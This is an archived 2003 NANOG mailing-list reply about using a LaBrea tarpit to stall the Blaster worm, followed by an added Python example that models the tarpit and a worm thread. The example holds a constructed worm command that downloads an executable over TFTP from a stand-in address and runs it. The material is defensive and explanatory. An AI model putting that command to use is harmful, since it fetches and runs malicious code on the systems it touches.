[60698] in North American Network Operators' Group

home help back first fref pref prev next nref lref last post

Re: The impending DDoS storm

daemon@ATHENA.MIT.EDU (Jeff Kell)
Thu Aug 14 23:26:18 2003

Date: Thu, 14 Aug 2003 23:02:08 -0400
From: Jeff Kell <jeff-kell@utc.edu>
To: Dan Hollis <goemon@anime.net>
Cc: Jason Frisvold <friz@corp.ptd.net>,
	Lloyd Taylor <ltaylor@keynote.com>, Jack Bates <jbates@brightok.net>,
	nanog@merit.edu
In-Reply-To: <Pine.LNX.4.44.0308131120560.18194-100000@sasami.anime.net>
Errors-To: owner-nanog-outgoing@merit.edu


Dan Hollis wrote:
> On Wed, 13 Aug 2003, Jason Frisvold wrote:
>>If the blaster cannot get a proper DNS response, it continues to
>>replicate via port 135... It then goes into a retry cycle and continues
>>to try to get a good DNS lookup.

> has anyone tried tarpitting eg labrea to slow the worm?

Oh yeah, LaBrea sticks 'em *REAL* good...

> LaBrea::Tarpit SOURCE IP's
> 15223 total threads captured, from these 109 IP addresses

LaBrea makes it look like the exploit worked, and it hangs up the worm
trying to send the command to 4444.  Thread counts get as high as 2546
(as of now), which is 10x the subnet block where the tarpit lives.
Had more like 30K threads until this morning, when we had a power outage
that outlived my small UPS, so the numbers above are since ~9:30 EST this
morning.

Jeff
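The capture mechanism Jeff describes (the handshake completes so the exploit looks successful, then the worm's thread sits forever on its port 4444 command) can be modelled in user space. The block below is an added example for this archive page, not LaBrea's code and not anything posted in the thread: it holds accepted connections without ever reading or answering, keeps a per-source tally in the shape of the "N total threads captured, from these M IP addresses" report quoted above, and models a worm thread that connects, sends its command and waits. The port, the 192.0.2.10 address and the command text are constructed for the example; a real LaBrea works at the packet level on unused addresses and keeps the peer in a zero-window persist state, which a user-space socket cannot reproduce exactly.

```python
import socket
import threading
from collections import Counter


class Tarpit:
    """Accept TCP connections and hold them open without reading or replying.

    A thread that connects here completes its handshake (so the exploit looks
    like it worked), sends its command, and then waits for a reply that never
    comes. User-space approximation for illustration only; LaBrea does the
    equivalent at the packet level and keeps the peer in zero-window persist.
    """

    def __init__(self, host="127.0.0.1", port=0):
        self._listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # Ask for the smallest receive buffer the kernel allows (it clamps the
        # value up); accepted sockets inherit it, so the peer's send window
        # closes quickly once we stop draining it, which we never start.
        self._listener.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1)
        self._listener.bind((host, port))
        self._listener.listen(256)
        self._listener.settimeout(0.1)
        self.port = self._listener.getsockname()[1]
        self._held = []               # captured connections, never read
        self._per_source = Counter()  # source IP -> captured connections
        self._lock = threading.Lock()
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._accept_loop, daemon=True)
        self._thread.start()

    def _accept_loop(self):
        while not self._stop.is_set():
            try:
                conn, (src_ip, _) = self._listener.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            with self._lock:
                self._held.append(conn)
                self._per_source[src_ip] += 1

    def report(self):
        """Summary shaped like LaBrea's 'N total threads captured, from M IPs'."""
        with self._lock:
            return {"threads": sum(self._per_source.values()),
                    "sources": len(self._per_source)}

    def close(self):
        self._stop.set()
        self._thread.join()
        with self._lock:
            for conn in self._held:
                conn.close()
            self._held.clear()
        self._listener.close()


# Constructed stand-in for the command a Blaster thread pushes over port 4444
# after the RPC overflow; the address and payload here are made up.
WORM_COMMAND = b"tftp -i 192.0.2.10 GET msblast.exe\r\nstart msblast.exe\r\n"


def worm_thread(port, command=WORM_COMMAND, timeout=1.0):
    """Model one worm thread: connect, send its command, wait for the shell.

    Returns "refused" (nothing listening), "closed" (peer hung up),
    "replied" (a real shell answered) or "held" (the command was accepted
    and the thread is still waiting when the timeout expires, which is
    what the tarpit produces).
    """
    try:
        with socket.create_connection(("127.0.0.1", port), timeout=timeout) as s:
            s.sendall(command)
            try:
                data = s.recv(1024)
            except socket.timeout:
                return "held"
            return "closed" if not data else "replied"
    except ConnectionRefusedError:
        return "refused"


if __name__ == "__main__":
    pit = Tarpit()
    outcomes = [worm_thread(pit.port) for _ in range(5)]
    print(outcomes, pit.report())
    pit.close()
```

Run stand-alone it prints five "held" outcomes and a report of 5 threads from 1 source (everything comes from 127.0.0.1 here). Against a tarpit covering a /24 of unused addresses, each infected host hits many of those addresses and each hit is a stuck thread, which is why the thread count runs well past the number of addresses in the block.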


